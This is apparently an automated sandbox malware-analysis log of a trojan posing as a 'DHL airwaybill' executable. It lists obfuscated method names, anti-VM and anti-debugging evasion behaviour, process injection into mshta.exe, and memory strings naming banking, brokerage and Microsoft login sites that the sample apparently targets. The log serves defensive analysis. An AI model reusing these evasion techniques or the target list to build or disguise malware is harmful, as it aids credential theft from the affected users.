            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.8550000.6.raw.unpack, PFITS5g6su8FVYo35e.csHigh entropy of concatenated method names: 'e1Go2CeNgp', 'gRVoNr3grk', 'xPdoObOqSC', 'xDdokvUpjQ', 'WnLoZikds5', 'NZGom0JIar', 'Y9HoFvFoYw', 'jEeoeuB9fX', 'yDQoi70QvI', 'aufoAgA0eg'
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.8550000.6.raw.unpack, zDJiq47v4bi85xO4vA.csHigh entropy of concatenated method names: 'cfxmGWkxW9', 'kfRmj28jVQ', 'r4xmRMZln7', 'uNbmDmseFU', 'RH2mIUuQV0', 'mgumBk6iTb', 'fskmctKGwQ', 'JSnmQHqgbO', 'XtRmEZHYCH', 'WNGmyAg6W1'
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.8550000.6.raw.unpack, xGjOf7zhvY9TFGu5fD.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zIbpryFZa7', 'Sjjp40qitX', 'HeXpbqRPDc', 'YQYpHFaR8J', 'fv5po1aAHr', 'M2Zpp7H9iV', 'AsEpVinaiK'
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.8550000.6.raw.unpack, GhhoIpKw5Ftcr3MW8iJ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'DNLVlDDOCK', 'DFpVJdgiFa', 'mCmVCvFFXB', 'eDRVfNJVL4', 'dq3VWlHs0Y', 'mnFVXWQFSm', 'ryBVd06uYi'
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.8550000.6.raw.unpack, PddjRfvi1pWokwcaVJ.csHigh entropy of concatenated method names: 'aRpKm8uyoo', 'JZFKFuJisH', 'TKfKiZeGNQ', 'EUgKAnyeXI', 'uTyK4FYkA6', 'BGvKbM59C3', 'U0DueZWulMITJRpIPE', 'ggqd7BZbVGuKpXaJyW', 'rc5KKjc0A1', 'xIQKwW5vkP'
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.8550000.6.raw.unpack, iA6IGv8M59C3EZ3nTA.csHigh entropy of concatenated method names: 'pUXZa4onQD', 'awyZN8xuTM', 'plcZkyeiRi', 'qNNZmYMjny', 'f0MZFC6BS9', 'oepkWl80nC', 'pcIkX5KYQO', 'j3rkdNEM21', 'PlXkg4dFFM', 'DtyktPdhss'
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.8550000.6.raw.unpack, FeXIsLyJ1eZiNuTyFY.csHigh entropy of concatenated method names: 'hoHkIgTWj5', 'TeXkcRlKl0', 'ziWO0aX7nB', 'StFOhKtqqV', 'ml1O3Ndj4Y', 'W6tOqNs3cI', 'l2EOMx1Ssm', 'dbMOSvD2i3', 'JHCO7Y3Te2', 'oXyOscGZyX'
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.8550000.6.raw.unpack, s8uyooQ3ZFuJisHEdm.csHigh entropy of concatenated method names: 'agxNlfKmoV', 'HyQNJ6fBdd', 'vQONCFpNNl', 'hvBNfQxZ2G', 'eifNWeEvew', 'OV0NXsZ0Lb', 'JdMNdCaFkg', 'OGFNgjqRIG', 'RaONtnEoO8', 'WvcNUyomZv'
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.8550000.6.raw.unpack, coCjNfEKfZeGNQEUgn.csHigh entropy of concatenated method names: 'onCODN5FeM', 'HkROBwUcqV', 'IIXOQobVHM', 'm9LOEnBnkX', 'U0OO4vAIhA', 'XlmObSJq5c', 'jMwOHtKbcH', 'dkDOoOT1ts', 'JtEOpkGBEA', 'Vi0OVVSeR1'
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.8550000.6.raw.unpack, v8DN9pNuUqReIRa3sc.csHigh entropy of concatenated method names: 'Dispose', 'w42KtwnkXB', 'Q3V5n3baFs', 'cnskkLeBWR', 'iPFKUITS56', 'Nu8KzFVYo3', 'ProcessDialogKey', 'ceh5Lq65bY', 'R415KXLOQS', 'D2p55J5cUK'
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.8550000.6.raw.unpack, O5e07N5AsjTjYA0fbh.csHigh entropy of concatenated method names: 'qqUR0T1sy', 'Y3UDKWUuv', 'XbPBngBfR', 'yt1coJJTI', 'XpxEIN71Q', 'qWty1S9AU', 'uBwVIlUABn8gTxS7T0', 'chjR0cK7hDUlxOsH22', 'mBroKSxXR', 'qAfVm7mN4'
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.8550000.6.raw.unpack, emu8FuFpCfwR9JjoYE.csHigh entropy of concatenated method names: 'rRVwaOWCKD', 'jVow2jCpY6', 'ePWwNyYACU', 'q2xwOp0Vsq', 'yljwkHyrEx', 'iVywZsjMeH', 'ii9wmAf3h6', 'hjVwFA5slT', 'LInweruvQL', 'TI1wiN4YOC'
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.8550000.6.raw.unpack, R5cUKiU6aNgguvgt3B.csHigh entropy of concatenated method names: 'r30pKqBBjI', 'm5Apwovu1b', 'dGQpvKrHLK', 'cl3p2lZEJ6', 'xRNpNxXy3C', 'TkNpkr0wyf', 'l0IpZbYHYq', 'JV2odUe8Sr', 'yUyogBXl6b', 'PnlotIRnPl'
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.8550000.6.raw.unpack, R3xhl7XDuPEX7EZrS0.csHigh entropy of concatenated method names: 'iyIHgO7SI6', 'v6kHU6mwXX', 'FSnoLWnlF7', 'nH5oKsSgTe', 'fp5H6Q4aCW', 'NCFHPWBttf', 'uAaH9Z2oII', 'x8cHlYsNsN', 'S1mHJauNbJ', 'bj3HCj13Rm'
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.3a36728.3.raw.unpack, GMtSvpf5AilnKv2aga.csHigh entropy of concatenated method names: 'bYkHiQSiaB', 'GQlHAQBhNb', 'ToString', 'GX4H2wC31W', 'K3YHNBEJwx', 'kKdHOHDsqH', 'woqHkuTtgb', 'UelHZjqJlL', 'I0sHm2ig7W', 'DeYHFqwrk0'
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.3a36728.3.raw.unpack, U6wYXWKKSn3IGRNEuEG.csHigh entropy of concatenated method names: 'ToString', 'XewVwytVWT', 'RgtVvlP9cR', 'QRoVaFZ5pa', 'DrYV2C5et0', 'AmIVNgOEPB', 'zL2VOCKZc0', 'L8LVkyZnp0', 'PxQqT3aXPlIyhMNcmXj', 'fs2BWFaUE8hOMGp2EYd'
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.3a36728.3.raw.unpack, dTPmcsMsBVnAjs1cVT.csHigh entropy of concatenated method names: 'CJ6m2BgOLf', 'zHxmOkooLR', 'AlwmZnKREB', 'DlEZUaoZLM', 'uymZzvJCpt', 'GrrmLQfQvF', 'QEdmKfSikJ', 'zW6m5xBUfL', 'R8pmwvpbAD', 'r58mvQnP4B'
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.3a36728.3.raw.unpack, qsjP1hKLoqD9W8AXKl9.csHigh entropy of concatenated method names: 'xS6pGICvvp', 'V6wpjcVyj0', 'TSApRUghmu', 'QDipDIMTaa', 'GVKpIguPUV', 'OvYpBbrlma', 'N3ipc25LVr', 'fbapQiDMoW', 'HRhpE8xKUS', 'qstpyT71xg'
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.3a36728.3.raw.unpack, x2ZQByCxqQjPXU7r8F.csHigh entropy of concatenated method names: 'ToString', 'PPPb6S3KoS', 'snZbnCIrCw', 'Yyhb0XZieT', 'U0bbhmeG6R', 'wtWb3VVYD0', 'm4lbqIElSn', 'oFqbMs7bGC', 'vt0bSpytX2', 'NoKb7CBs9T'
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.3a36728.3.raw.unpack, koZhoAlf7dm2EFDV3o.csHigh entropy of concatenated method names: 'ckt4sG0Zeb', 'PCm4P6xAL7', 's1v4lacb7k', 'Dac4J3R9Jb', 'jVe4nUfKVT', 'zen40e7Osw', 'GAB4hcqpyC', 'X6v43GAde3', 'i2T4q5lvS4', 'hUi4MXIVIm'
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.3a36728.3.raw.unpack, ReGbvE9Wxkq2eCxiMb.csHigh entropy of concatenated method names: 'xQ8rQXmtAn', 'Tl0rENTIY6', 'N03r8RsGQZ', 'tQgrnvkqUl', 'BwVrhTSOXL', 'wvqr3skOK2', 'Fl2rMmb0FN', 'PPIrStL5xW', 'AwxrsHZXGs', 'gFsr66Jd94'
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.3a36728.3.raw.unpack, Iq65bYtJ41XLOQSQ2p.csHigh entropy of concatenated method names: 'sx2o8E2yP3', 'VU1onMn0C8', 'EOco0r2X8L', 'GuaohFR8XW', 'rePoly7mXq', 'jEOo3itsP8', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.3a36728.3.raw.unpack, PFITS5g6su8FVYo35e.csHigh entropy of concatenated method names: 'e1Go2CeNgp', 'gRVoNr3grk', 'xPdoObOqSC', 'xDdokvUpjQ', 'WnLoZikds5', 'NZGom0JIar', 'Y9HoFvFoYw', 'jEeoeuB9fX', 'yDQoi70QvI', 'aufoAgA0eg'
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.3a36728.3.raw.unpack, zDJiq47v4bi85xO4vA.csHigh entropy of concatenated method names: 'cfxmGWkxW9', 'kfRmj28jVQ', 'r4xmRMZln7', 'uNbmDmseFU', 'RH2mIUuQV0', 'mgumBk6iTb', 'fskmctKGwQ', 'JSnmQHqgbO', 'XtRmEZHYCH', 'WNGmyAg6W1'
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.3a36728.3.raw.unpack, xGjOf7zhvY9TFGu5fD.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zIbpryFZa7', 'Sjjp40qitX', 'HeXpbqRPDc', 'YQYpHFaR8J', 'fv5po1aAHr', 'M2Zpp7H9iV', 'AsEpVinaiK'
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.3a36728.3.raw.unpack, GhhoIpKw5Ftcr3MW8iJ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'DNLVlDDOCK', 'DFpVJdgiFa', 'mCmVCvFFXB', 'eDRVfNJVL4', 'dq3VWlHs0Y', 'mnFVXWQFSm', 'ryBVd06uYi'
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.3a36728.3.raw.unpack, PddjRfvi1pWokwcaVJ.csHigh entropy of concatenated method names: 'aRpKm8uyoo', 'JZFKFuJisH', 'TKfKiZeGNQ', 'EUgKAnyeXI', 'uTyK4FYkA6', 'BGvKbM59C3', 'U0DueZWulMITJRpIPE', 'ggqd7BZbVGuKpXaJyW', 'rc5KKjc0A1', 'xIQKwW5vkP'
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.3a36728.3.raw.unpack, iA6IGv8M59C3EZ3nTA.csHigh entropy of concatenated method names: 'pUXZa4onQD', 'awyZN8xuTM', 'plcZkyeiRi', 'qNNZmYMjny', 'f0MZFC6BS9', 'oepkWl80nC', 'pcIkX5KYQO', 'j3rkdNEM21', 'PlXkg4dFFM', 'DtyktPdhss'
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.3a36728.3.raw.unpack, FeXIsLyJ1eZiNuTyFY.csHigh entropy of concatenated method names: 'hoHkIgTWj5', 'TeXkcRlKl0', 'ziWO0aX7nB', 'StFOhKtqqV', 'ml1O3Ndj4Y', 'W6tOqNs3cI', 'l2EOMx1Ssm', 'dbMOSvD2i3', 'JHCO7Y3Te2', 'oXyOscGZyX'
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.3a36728.3.raw.unpack, s8uyooQ3ZFuJisHEdm.csHigh entropy of concatenated method names: 'agxNlfKmoV', 'HyQNJ6fBdd', 'vQONCFpNNl', 'hvBNfQxZ2G', 'eifNWeEvew', 'OV0NXsZ0Lb', 'JdMNdCaFkg', 'OGFNgjqRIG', 'RaONtnEoO8', 'WvcNUyomZv'
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.3a36728.3.raw.unpack, coCjNfEKfZeGNQEUgn.csHigh entropy of concatenated method names: 'onCODN5FeM', 'HkROBwUcqV', 'IIXOQobVHM', 'm9LOEnBnkX', 'U0OO4vAIhA', 'XlmObSJq5c', 'jMwOHtKbcH', 'dkDOoOT1ts', 'JtEOpkGBEA', 'Vi0OVVSeR1'
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.3a36728.3.raw.unpack, v8DN9pNuUqReIRa3sc.csHigh entropy of concatenated method names: 'Dispose', 'w42KtwnkXB', 'Q3V5n3baFs', 'cnskkLeBWR', 'iPFKUITS56', 'Nu8KzFVYo3', 'ProcessDialogKey', 'ceh5Lq65bY', 'R415KXLOQS', 'D2p55J5cUK'
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.3a36728.3.raw.unpack, O5e07N5AsjTjYA0fbh.csHigh entropy of concatenated method names: 'qqUR0T1sy', 'Y3UDKWUuv', 'XbPBngBfR', 'yt1coJJTI', 'XpxEIN71Q', 'qWty1S9AU', 'uBwVIlUABn8gTxS7T0', 'chjR0cK7hDUlxOsH22', 'mBroKSxXR', 'qAfVm7mN4'
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.3a36728.3.raw.unpack, emu8FuFpCfwR9JjoYE.csHigh entropy of concatenated method names: 'rRVwaOWCKD', 'jVow2jCpY6', 'ePWwNyYACU', 'q2xwOp0Vsq', 'yljwkHyrEx', 'iVywZsjMeH', 'ii9wmAf3h6', 'hjVwFA5slT', 'LInweruvQL', 'TI1wiN4YOC'
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.3a36728.3.raw.unpack, R5cUKiU6aNgguvgt3B.csHigh entropy of concatenated method names: 'r30pKqBBjI', 'm5Apwovu1b', 'dGQpvKrHLK', 'cl3p2lZEJ6', 'xRNpNxXy3C', 'TkNpkr0wyf', 'l0IpZbYHYq', 'JV2odUe8Sr', 'yUyogBXl6b', 'PnlotIRnPl'
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.3a36728.3.raw.unpack, R3xhl7XDuPEX7EZrS0.csHigh entropy of concatenated method names: 'iyIHgO7SI6', 'v6kHU6mwXX', 'FSnoLWnlF7', 'nH5oKsSgTe', 'fp5H6Q4aCW', 'NCFHPWBttf', 'uAaH9Z2oII', 'x8cHlYsNsN', 'S1mHJauNbJ', 'bj3HCj13Rm'
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeFile created: \dhl airwaybill # 6913321715 & bl draft copy.exe
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeFile created: \dhl airwaybill # 6913321715 & bl draft copy.exeJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Yara detected AntiVM3
            Source: Yara matchFile source: Process Memory Space: DHL airwaybill # 6913321715 & BL Draft copy.exe PID: 3212, type: MEMORYSTR
            Switches to a custom stack to bypass stack traces
            Source: C:\Windows\SysWOW64\mshta.exeAPI/Special instruction interceptor: Address: 7FFDB442D324
            Source: C:\Windows\SysWOW64\mshta.exeAPI/Special instruction interceptor: Address: 7FFDB442D7E4
            Source: C:\Windows\SysWOW64\mshta.exeAPI/Special instruction interceptor: Address: 7FFDB442D944
            Source: C:\Windows\SysWOW64\mshta.exeAPI/Special instruction interceptor: Address: 7FFDB442D504
            Source: C:\Windows\SysWOW64\mshta.exeAPI/Special instruction interceptor: Address: 7FFDB442D544
            Source: C:\Windows\SysWOW64\mshta.exeAPI/Special instruction interceptor: Address: 7FFDB442D1E4
            Source: C:\Windows\SysWOW64\mshta.exeAPI/Special instruction interceptor: Address: 7FFDB4430154
            Source: C:\Windows\SysWOW64\mshta.exeAPI/Special instruction interceptor: Address: 7FFDB442DA44
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeMemory allocated: BD0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeMemory allocated: 27E0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeMemory allocated: 2660000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeMemory allocated: 85E0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeMemory allocated: 95E0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeMemory allocated: 97D0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeMemory allocated: A7D0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B4096E rdtsc 3_2_01B4096E
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeWindow / User API: threadDelayed 9639Jump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\mshta.exeAPI coverage: 2.7 %
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe TID: 1172Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe TID: 1172Thread sleep time: -80000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe TID: 1172Thread sleep count: 38 > 30Jump to behavior
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe TID: 1172Thread sleep time: -57000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe TID: 1172Thread sleep count: 40 > 30Jump to behavior
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe TID: 1172Thread sleep time: -40000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exe TID: 364Thread sleep count: 333 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\mshta.exe TID: 364Thread sleep time: -666000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exe TID: 364Thread sleep count: 9639 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\mshta.exe TID: 364Thread sleep time: -19278000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\mshta.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_0053C210 FindFirstFileW,FindNextFileW,FindClose,6_2_0053C210
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: 14_8-J-J8.6.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
            Source: 14_8-J-J8.6.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
            Source: 14_8-J-J8.6.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
            Source: 14_8-J-J8.6.drBinary or memory string: discord.comVMware20,11696487552f
            Source: 14_8-J-J8.6.drBinary or memory string: bankofamerica.comVMware20,11696487552x
            Source: mshta.exe, 00000006.00000002.4609609702.0000000007A61000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rdVMware
            Source: 14_8-J-J8.6.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
            Source: 14_8-J-J8.6.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
            Source: mshta.exe, 00000006.00000002.4609609702.0000000007A61000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,116
            Source: 14_8-J-J8.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
            Source: 14_8-J-J8.6.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
            Source: 14_8-J-J8.6.drBinary or memory string: global block list test formVMware20,11696487552
            Source: 14_8-J-J8.6.drBinary or memory string: tasks.office.comVMware20,11696487552o
            Source: 14_8-J-J8.6.drBinary or memory string: AMC password management pageVMware20,11696487552
            Source: toceDGfrPzLv.exe, 00000005.00000002.4605849223.0000000001700000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.4603364432.0000000002633000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2665368981.000002DD8F59E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 14_8-J-J8.6.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
            Source: 14_8-J-J8.6.drBinary or memory string: interactivebrokers.comVMware20,11696487552
            Source: 14_8-J-J8.6.drBinary or memory string: dev.azure.comVMware20,11696487552j
            Source: 14_8-J-J8.6.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
            Source: 14_8-J-J8.6.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
            Source: 14_8-J-J8.6.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
            Source: mshta.exe, 00000006.00000002.4609609702.0000000007A61000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tion PasswordVMware20,11696487552}
            Source: 14_8-J-J8.6.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
            Source: 14_8-J-J8.6.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
            Source: 14_8-J-J8.6.drBinary or memory string: outlook.office365.comVMware20,11696487552t
            Source: 14_8-J-J8.6.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
            Source: 14_8-J-J8.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
            Source: 14_8-J-J8.6.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
            Source: 14_8-J-J8.6.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
            Source: 14_8-J-J8.6.drBinary or memory string: outlook.office.comVMware20,11696487552s
            Source: 14_8-J-J8.6.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
            Source: 14_8-J-J8.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
            Source: 14_8-J-J8.6.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
            Source: mshta.exe, 00000006.00000002.4609609702.0000000007A61000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .comVMware20,11696487552
            Source: 14_8-J-J8.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
            Source: 14_8-J-J8.6.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
